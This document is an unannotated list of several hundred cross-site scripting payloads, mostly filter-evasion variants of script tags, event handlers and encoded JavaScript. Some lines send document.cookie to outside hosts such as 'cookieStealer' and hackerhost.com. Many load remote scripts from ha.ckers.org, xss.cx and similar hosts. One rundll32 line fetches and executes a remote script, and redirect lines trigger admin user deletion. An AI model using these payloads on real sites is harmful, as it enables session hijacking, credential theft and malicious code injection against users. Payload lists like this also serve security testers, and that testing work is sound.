“==prompt(9)==”
“>=prompt(9)>=”
“>>>prompt(9)>>>”
“>>prompt(9)>>”
“>prompt(9)>”
“||prompt(9)||”
“|prompt(9)|”
“-prompt(9)-”
“!=prompt(9)!=”
“?prompt(9):”
“/prompt(9)/”
“*prompt(9)*”
prompt(9)
prompt`${document.domain}`
prompt(location.hash)
//prompt.ml%2f@??
//prompt.ml%2f@?.ws/?
prompt = p\u0072om\u0070\u0074
Prompt = p\u0072om\u0070\u0074
prompt(‘xss’)
protected $_expressions = array(
prototype.join=function(){confirm(“PWND:”+document.body.innerHTML)}’)();
p=*/</script>’>alert(1)/*<script/1=’
p[<script>`]=`/alert(70)</script>
<P><SPAN class=xmsw title=~?O? onmo&#117;&#115;eout=”window.loca&#116;ion=’http://www.xfydyt.com'">F?A?~M</SPAN></P>
<P STYLE=”behavior:url(‘#default#time2’)” end=”0" onEnd=”javascript:alert(1)”>
<p style=”font-family:’ar\27 \3bx\3a expression\28xss\28\29\29\3bial’;”></p>
<p style=”font-family:’foo&amp;#x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(confirm(1))’”>
<p style=overflow:auto;font-size:1000px onscroll=alert(33)>script<k/id=die>
p=<svg/1=’&q=’onload=alert(1)>
p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
p=<svg 1=’&q=onload=’/*&r=*/alert(1)’>
p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>
p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
*&p=<svg/onload=eval(0+location.search)>&*/1:alert(document.domain)
*&p=<svg/onload=eval%280%2Blocation.search%29>&*/1:alert%28document.domain%29
“‘`><p><svg><script>a=’hello\x27;javascript:alert(1)//’;</script></p>
<p>This is a secret text.</p>
pune<script>alert(document.cookie)</script>
=pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
p=’/wp-admin/plugin-editor.php?’
<?PXML><html:script>alert(29)</html:script>
<PXML><html:script>alert(30)</html:script>
?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>
?q=%ED%A0%80\”))}catch(e){alert(1)}//
q=e=>{return e};q.constructor(String.raw(q`a${0}e${0}t${0}1337)`,’l’,’r’,’(‘))();
<Q%^&*(�G@!���� style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<q/oncut=alert()>
<q/oncut=alert(1)>
<q/oncut=confirm()
<q/oncut=open>
<q/oncut=open()>
‘/><q/oncut=open()>//
Qp4LnNlbmQoJCk=
\&quot;;alert(&apos;XSS&apos;);//
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
>&quot;&gt;&lt;script&gt;confirm(&#039;hi&#039;)&lt;/script&gt;&quot;&lt;</a>value=””><script>confirm(‘hi’)</script>”<”/>
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
React.createElement
{{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (‘’+’’.toString(‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’)));}}
<rect fill=”white” style=”clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);”/>
<rect width=��1000�� height=��1000�� fill=��white��/></a></svg>
Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Reflect.set(location, ‘href’, ‘javascript:alert(1)’)
.replace(/.+/,eval)//
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
**/ression(alert(/1/))”>1</div>
Result => javas + cript: + ale + rt + ( + 1 + )
Result => javas + cript: + ale + rt + (1)
Result => javascript:alert(1)
Result => javascript: + /*click me! + #*/alert(1)
Result => javascript: +’click me! + #’-alert(1)
Result => javas + script: + ale + rt + (1)
Results for <?php echo $_GET[‘q’];?>”:
return bindingFunction(bindingContext,node);
return new Function(“$context”,”$element”, functionBody);
“‘<>\r\n\ being escaped
) = &rpar;
(_+`rt(let)`)``
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;o=GetObject(“script:http://goo.gl/jApjhr “);o.Exec();close();
<s “‘“=”” 000=””>
“‘“><s/000 “‘“><s/000
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
s1=0?’1':’i’; s2=0?’1':’fr’; s3=0?’1':’ame’; i1=s1+s2+s3; s1=0?’1':’jav’; s2=0?’1':’ascr’; s3=0?’1':’ipt’; s4=0?’1':’:’; s5=0?’1':’ale’; s6=0?’1':’rt’; s7=0?’1':’(1)’; i2=s1+s2+s3+s4+s5+s6+s7;
s1=0?’’:’i’;s2=0?’’:’fr’;s3=0?’’:’ame’;i1=s1+s2+s3;s1=0?’’:’jav’;s2=0?’’:’ascr’;s3=0?’’:’ipt’;s4=0?’’:’:’;s5=0?’’:’ale’;s6=0?’’:’rt’;s7=0?’’:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
s1=’java’||’’+’’;s2=’scri’||’’+’’;s3=’pt’||’’+’’;
s1=[‘java’||’’+’’]; s2=[‘scri’||’’+’’]; s3=[‘pt’||’’+’’];
s1=[‘java’+’’+’’+’scr’+’ipt’+’:’+’aler’+’t’+’(1)’];
s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’; u1=s1+s2+s3;URL=u1
s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’;u1=s1+s2+s3;URL=u1
s1=!’’&&’jav’;s2=!’’&&’ascript’;s3=!’’&&’:’;s4=!’’&&’aler’;s5=!’’&&’t’;s6=!’’&&’(1)’;s7=s1+s2+s3+s4+s5+s6;URL=s7;
s1=<s>evalalerta(1)a</s>,s2=<s></s>+’’,s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
><s”%2b”cript>alert(document.cookie)</s”%2B”cript>
><s%2bcript>alert(document.cookie)</script>
“><s”%2b”cript>alert(document.cookie)</script>
��><s��%2b��cript>alert(document.cookie)</script>
><s%2bcript>alert(/Xss-By-Muhaddi/)</script>
><s%2bcript>alert(/Xss/)</script>
��><s��%2b��cript>alert(/Xss/)</script>
<! — sample vector → <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
<ScaleLoadingMov>1</ScaleLoadingMov>
<sc#ipt> continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
<sc#ipt>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
<sc#ipt>if(top!=self)top.location=location</script>
<SCR%00IPT>alert(“XSS”)</SCRIPT>
<SCR%00IPT>confirm(document.location)</SCR%00IPT>
<scr%00ipt>prompt(1)</sc%00ript>
<scr%00ript>confirm(0);</scr%00ipt>
<scr\0ipt>prompt(1)</sc\0ript>
<<scr\0ipt/src=http://xss.com/xss.js></script
<<scr\0ipt/src=http://xss.cx/xss.js></script
“><scr&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;pt>
<scr<! — esi →ipt>aler<! — esi →t(1)</sc<! — esi →ript>
<scri%00ipt>confirm(0);</script>
<scri%00pt>alert(1);</scri%00pt>
<Scri% 00pt> alert (1); </ scri% 00pt>
<scri%00pt>confirm(0);</scri%00pt>
><scri%00pt>confirm(0);</scri%00pt>
“<scri%00pt>confirm(0);</scri%00pt>”
“\”><scri%00pt>confirm(0);</scri%00pt>”,
<scri%00pt>confirm(1);</scri%00pt>
</script>
<script>/*
<script>
“<! — <script>”
“<! — script>”
“><script>”
*/</script>
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0��//(%000000%0dalert(1)
<script/%00%00v%00%00>alert(/renwax23/)</script>
<script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0a3//(%000000%0dconfirm(1)//
<script>({0:#0=alert/#0#/#0#(0)})</script>
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script%00>alert(1)</script%00>
<script>({0:#0=confirm/#0#/#0#(0)})</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script%0a%0dConfirm(1);</script>
<script>//>%0Aalert(1);</script>
</script%0A-_-><script>confirm(1)</script%0A-_->
<script%0Caaaaa>alert(123)</script>
<script>(0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();</script>
<script%0Daaa>alert(1)</script%0Daaaa>
<script>++1-+?(1)</script>
<script>+-+-1-+-+alert(1)</script>
<script>/<1/>alert(document.domain)</script></svg>
<script>$=1,alert($)</script>
<script>$=1,alert($)</script>//INJECTX
“<script>1-confirm(0);</script>”/>
<script>+-+-1-+-+confirm(1)</script>
“/><script>+-+-1-+-+confirm(1)</script>
<script>1</script>
<script>$=1,\u0061lert($)</script>
>”><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<ScRiPt%20>prompt(document.domain)</ScRiPt>
<script%20src%3D”http%3A%2F%2F0300.0250.0000.0001">
<script%20src%3D”http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
<script%20src=”//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
<script%20TEST>alert(1)</script%20TESTTEST>
<ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<ScRipT 5–0*3?=>prompt(1)</ScRipT giveanswerhere=?
<script>’a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>a=’abc\*chr*\’;log(*num*)//def’;</script>
<;SCRIPT a=”;blah”; ‘;’; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<SCRIPT a=”blah” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>a=document.cookie
<script>a=eval;b=alert;a(b(/ 1/.source));</script>’”>
<script>a=eval;b=alert;a(b(/i/.source));</script>
<SCRIPT “a=’>’” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<SCRIPT a=`>` id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<SCRIPT a=”>” ‘’ id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<SCRIPT a=”>” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<script>a=`jackmasa<! — <script/\`;</script>
<script ~~~>alert(0%0)</script ~~~>
`><script>alert(0)</script>
<<script>alert(0)</script>
‘’;! — “<script>alert(0);</script>=&{()}
“><script>alert(0)</script>
‘’;! — “<script>alert(0);</script>=&{(alert(1))}
</script>”-alert(0)-”><svg onload=’;alert(178);’>
\”><script>alert(0x000123)</script>
\”><sCriPt>alert(0x000123)</sCriPt>
<script>alert(1)//
<script>alert(1)//
“><script>alert(1)<! —
“><script>alert(1)//
*//><script>/*alert(1)//
*//”><script>/*alert(1)//
<script>alert(1)%0d%0a →%09</script
<script>alert(1234)</script>
/<script>alert(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>##0
<script>alert(123)</script>
><script>alert(123)</script>
→<script>alert(123)</script>
‘><script>alert(123)</script>
“><script>alert(123)</script>
scriptalert(123)/script
&<script>alert(123)</script>=123
><script>alert(123);</script x=
‘><script>alert(123);</script x=’
“><script>alert(123);</script x=”
<script>alert(129)//
<script>alert(130)<!�V
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
“><script>alert(1337)</script>”><script>alert(“XSS by \nxss</h1></marquee>
*/</script>’>alert(157)/*<script/157=’
<script>alert(159)</script>
<script>alert(‘1’)</alert>
<script>alert(1);&b=bar
<script>alert(1);/*&b=*/</script>
<script>({[alert(1)](){}});({get[alert(2)](){}});({set[alert(3)](a){}});</script>
<script>alert(1)<! — INJECTX
<script>alert(1)//INJECTX
<script>alert(1)&lt/script&gt&#039;><button>CLICK
<%<! — ‘%><script>alert(1);</script →
<script<{alert(1)}/></script </>
<script>/* */alert(1)/* */</script>
<script>/&/-alert(1)</script>
<script>”=>” * alert(1)</script>
<script>({‘ \ ‘(){alert(1)}})[` \ `]()</script>
<script>alert`1`</script>
<script>alert(1)</script>
<script>alert(1)</script>
<script>alert(1)</script
<script>alert(1);</script>
<script /**/>/**/alert(1)/**/</script /**/
???script?alert(1)?/script?
<scRipt>alErt(1)</scrIpt>
<scRiPt>alert(1);</scrIPt>
<sCrIpt>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<sCRiPt>alert(1);</sCRipT>
<Script>alert(1)</Script>
<ScRiPt>alert(1)</sCriPt>
<<SCRIPT>alert(1);//<</SCRIPT>
*/</script>’>alert(1)/*<script/1=’
&”><script>alert(1)</script>=1
“><script>alert(1)</script>=1”onPaste=”eval(‘;)\’SSX\’(trela’.split(‘’).reverse().join(‘’))”
<script>-=alert;-(1)</script> “onmouseover=”confirm(document.domain);”” </script>
<script>alert(1);</script> <script>prompt(1);</script> <script>confirm (1);</script> <script src=”http://rhainfosec.com/evil.js">
<script>alert(1)<!�V
<script>alert(1)<!V
<script>alert`1`;var something = `abc${alert(1)}def`;``.constructor.constructor`alert\`1\````;</script>
<script/&>alert(25)</script>
<script>alert(2)</script> “><img src=x onerror=prompt(document.domain)>
<script>alert(2)&sol;&sol;!#ERROR?&^%$#</script>
<script>alert(/3/)</script>
‘> <script>alert(3)</script>
> <script>alert(4)</script>
`> <script>alert(5)</script>
<script>/&/-alert(7)</script>
<script>alert(/7/.source)</script>
<script>+alert(88199)</script>
<script>alert(/88199/)</script>
<script>alert(88199)</script>
<script>alert(/88199/.source)</script>
“><script>alert(9)</script><a”
<script>alert(9)</script<br>
]]><script>alert(9)</script><![CDATA[
<script>alert(document.cookie)</script>”>
<script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
><<script>alert(document.cookie);//<</script>
‘><script>alert(document.cookie)</script>
‘><script>alert(document.cookie);</script>
“><<script>alert(document.cookie);//<</script>
“><script>alert(document.cookie)</script>/><’:
“><script>alert(document.cookie)</script>
“/><script>alert(document.cookie);</script>
��><<script>alert(document.cookie);//<</script>
><ScRiPt>alert(document.cookie)</script>
��><ScRiPt>alert(document.cookie)</script>
“>’><SCRIPT>alert(document.cookie)</SCRIPT>
<script>alert(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
<script>alert(document.domain)</script>
<script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
<script>alert(document.head.childNodes[3].text)</script>
<script>alert(document.head.innerHTML.substr(146,20));</script>
“><script>alert(document.location)</script><”
?script?alert(�FXSS�F)?/script?
?script?alert(FXSSF)?/script?
<script>alert(“hellox worldss”);</script>
<script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<ScRipt>ALeRt(“hi”);</sCRipT>
<script>alert(navigator.userAgent)<script>
<script>alert(String.fromCharCode(49,49))</script>
<script>alert(String.fromCharCode(49))</script>
<script ^__^>alert(String.fromCharCode(49))</script ^__^
“><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<script>alert(String.fromCharCode(88,83,83))</script>
“><script>alert(String.fromCharCode(88,83,83))</script>
“><script alert(String.fromCharCode(88,83,83))</script>
“><script alert(String.fromCharCode(88,83,83))</script>
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
“><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=”
\’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=\’
<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>
“><script>alert(‘test’)</script>
<<SCRIPT>alert(“test”);//<</SCRIPT>
<<script>alert(“WXSS”);//<</script>
<script>alert(“WXSS”)</script>
><ScRiPt>alert(Xss-By-Muhaddi)</sCrIpT>
<<SCRIPT>alert(Xss-By-Muhaddi);//<</SCRIPT>
<script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
“><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
><ScRiPt>alert(xss by shawar)</sCrIpT>
>/”><script>alert(‘xss message’)</script>
‘<script>alert(‘xss message’)</script>
“><script>alert(‘xss message’)</script>
=’><script>alert(“xss”)</script>
→<script>alert(xss);<script>
! — “ /><script>alert(‘xss’);</script>
<script>alert(��Xss��)</script>
<script>alert(Xss)</script>
><script>alert(/Xss/)</script>
><script>alert(Xss)</script>
��><script>alert(/Xss/)</script>
��><script>alert(��Xss��)</script>
<! — — →<script>alert(‘XSS’);</script><! — — →
<script>alert(‘XSS’)</script>

<script>alert(‘XSS’);</script>
<script>alert(&XSS&)</script>
>”><script>alert(“XSS”)</script>&
‘“><script>alert(‘XSS’)</script>
‘“>><script>alert(‘XSS’)</script>
‘“>><script>alert(‘XSS’)</script>
“><script>alert(‘XSS’)</script>
“><script>alert(��XSS��);</script>
“><script>alert(XSS);</script>
&<script>alert(‘XSS’);</script>”>
<ScRipt>ALeRt(XSS);</sCRipT>
><ScRiPt>alert(Xss)</sCrIpT>
��><ScRiPt>alert(��Xss��)</sCrIpT>
<<SCRIPT>alert(��Xss��);//<</SCRIPT>
<<SCRIPT>alert(Xss);//<</SCRIPT>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
<<SCRIPT>alert(XSS);//<</SCRIPT>
<;<;SCRIPT>;alert(“;XSS”;);//<;<;/SCRIPT>;
<;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;
<?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
<?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
<SCRIPT> alert(��XSS��); </SCRIPT>
<SCRIPT> alert(XSS); </SCRIPT>
<SCRIPT>alert(‘XSS’)</SCRIPT>
<SCRIPT>alert(‘XSS’);</SCRIPT>
<script>alert(‘xss’);</script>
<script>alert(“xss”);</script>
‘/*<script>alert(“xss”)</script>*/%2B’
<script>alert(“XSS”);</script>&search=1
<SCRIPT>alert(/XSS/.source)</SCRIPT>
<script>alert(yXSSz)</script>.
<script>alert(yXSSz)</script>
<script>/&amp;/-alert(1)</script>
<script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script>
<script’ + Array(999999).join(‘/’) + ‘>alert(1)<\/script>
<script>Array.from`1${alert}3${window}2`</script>
<script>Array.from([1],alert)</script>
<script>Array.from`${eval}alert\`1\``</script>
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC=”http://3w.org/xss.js"></SCRIPT>
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js"></SCRIPT>
<SCRIPT a=”>” “ SRC=”http://3w.org/xss.js"></SCRIPT>
<SCRIPT a=”>” SRC=”http://3w.org/xss.js"></SCRIPT>
<;SCRIPT “;a=’;>;’;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=`>;` SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=”;>;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=”;>’;>”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT+a=”>’>” SRC=”http://localhost"></SCRIPT>
<script “a=’>’” SRC=”http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC=”http://www.securitycompass.com/xss.js"></script>
<script a=”>’>” SRC=”http://www.securitycompass.com/xss.js"></script>
<script a=”>” ‘’ SRC=”http://www.securitycompass.com/xss.js"></script>
<script a=”>” SRC=”http://www.securitycompass.com/xss.js"></script>
<SCRIPT “a=’>’” SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=”>” ‘’ SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=”>” SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT “a=’>’” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=”>” ‘’ src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
<;SCRIPT>;a=/XSS/
<SCRIPT>a=/XSS/
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
“‘`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
<SCRIPT>a=/XSS/nalert(‘XSS’);</SCRIPT>
<script>a=/XSS/\ndocument.vulnerable=true;</script>
<script>/*//&b=*/alert(1);</script>
<SCRIPT <B>=alert(‘XSS’);”></SCRIPT>
?”></script><base%20c%3D=href%3Dhttps:\mysite>
<script>’bbbalert(1)cccc’.replace(/a\w{4}\(\d\)/,eval)</script>
<script <B>document.vulnerable=true;</script>
<;SCRIPT =”;blah”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<SCRIPT =”blah” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<script charset=”\x22>javascript:alert(1)</script>
<script>/* **chr*/log(*num*)// */</script>
‘“`><script>/* **chr*log(*num*)// */</script>
“`’><script>*chr*log(*num*)</script>
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script ~~~>confirm(0%0)</script ~~~>
<script>’confirm(0)%3B<%2Fscript>
><script>’confirm(0)%3B<%2Fscript>
“<script>’confirm(0)%3B<%2Fscript>”
“\”><script>’confirm(0)%3B<%2Fscript>”,
<script>confirm(0);</script>
><script>confirm(0)</script>
“<script>confirm(0);</script>”
“><”script”>”confirm(0)”</”script”>
“\”><script>confirm(0)</script>”,
<%<! — ‘%><script>confirm(1);</script →
<sc’+’ript>confirm(1)</script>
<script>/* */confirm(1)/* */</script>
<script>confirm (1);</script>
<script>confirm(1)</script>
<script ~~~>confirm(1)</script ~~~>
>”<>”<script>confirm(1)</script>
“‘><script>confirm(1)</script>”,
[<script>]=*confirm(1)</script>
<script Confirm(1);</script>
“/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
“\”/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>”
>”<>”<script>confirm(2)</script>
<script>confirm(88199)</script>
<script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
<script>confirm(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
<script>confirm(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
<script>confirm(document.head.childNodes[3].text)</script>
<script>confirm(document.head.innerHTML.substr(146,20));</script>
>”><script>confirm(document.location)</script>&
<SCRIPT>confirm(document.location);</SCRIPT>
<script>confirm(“&quot;no”)</script>
<script ^__^>confirm(String.fromCharCode(49))</script ^__^
<script>confirm(String.fromCharCode(88,83,83));</script>
><script>confirm(String.fromCharCode(88,83,83));</script>
“<script>confirm(String.fromCharCode(88,83,83));</script>”
“\”><script>confirm(String.fromCharCode(88,83,83));</script>”,
<script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450’)/***/</script /***/
<script>/*confirm(“Woops”);*/</script>
<script>confirm(x.y[0])</script>
<script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
<script>``.constructor.constructor`confirm\`1\````</script>
<script>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
“><script>co\u006efir\u006d`1`</script>
“><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
<script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>
<script>debugger;</script>
<script defer>alert(1)</script>
-<script/defer>alert(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<SCriPt>delete alert;alert(1)</sCriPt>
<script>delete[a=this[atob(‘YWxlcnQ=’)]]/prompt a(1)</script>
<script>delete /* code to execute */throw~delete~typeof~/* code to execute */delete[a=/* function */]/delete a(/* params */)var a = (new function(/* code to execute */))();</script>
<script>d.innerHTML+=’’;</script>
<script>`</div><div>`==alert(123)</script>
<script>`</div><div>`-alert(123)</script>
<script>`</div><div>`/=alert(123)</script>
<script>`</div><div>`/alert(123)</script>
<script>`</div><div>`*=alert(123)</script>
<script>`</div><div>`%alert(123)</script>
<script>`</div><div>`+alert(123)</script>
//’/<@/></script></div></script> →<select */onclick=alert()><o>1<o>2')//”<! —
<script>document.body.innerHTML=”<h1>XSS-Here</h1>”</script>
<script>document.forms[0].submit(); </script>
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
<script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
“><script>document.location=’http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
“><script>document.location=’http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
<<script>document.vulnerable=true;</script>
<! — — →<script>document.vulnerable=true;</script><! — — →
<![<! — ]]<script>document.vulnerable=true;// →</script>
<script>document.vulnerable=true;</script>
&<script>document.vulnerable=true;</script>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script>document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);</script>
<script>document[‘write’](88199);</script>
<script>document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);</script>
<script>document.write(Array(184).join(‘<marquee>’))</script>
<script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
<script>document.write(“<img/**/src=’1'/**/onerror=’alert(1)’/>”);</script>
<SCRIPT>Document.write(‘<img src=\’http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>’);</SCRIPT>
<script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
“/><script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
<script> document.write(‘<math><! — ‘); </script> <i name=” →<head><script>//”>alert(1)<! — </script> →
<script>document.write(‘<math><! — ‘);</script><i name=” →<head><script>//”>alert(1)<! — </script> →
<SCRIPT>document.write(“<SCRI”)
<script>document.write(‘<script>/*’);</script>*/alert(1)</script>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js"></SCRIPT>
<;SCRIPT>;document.write(“;<;SCRI”;);<;/SCRIPT>;PT SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
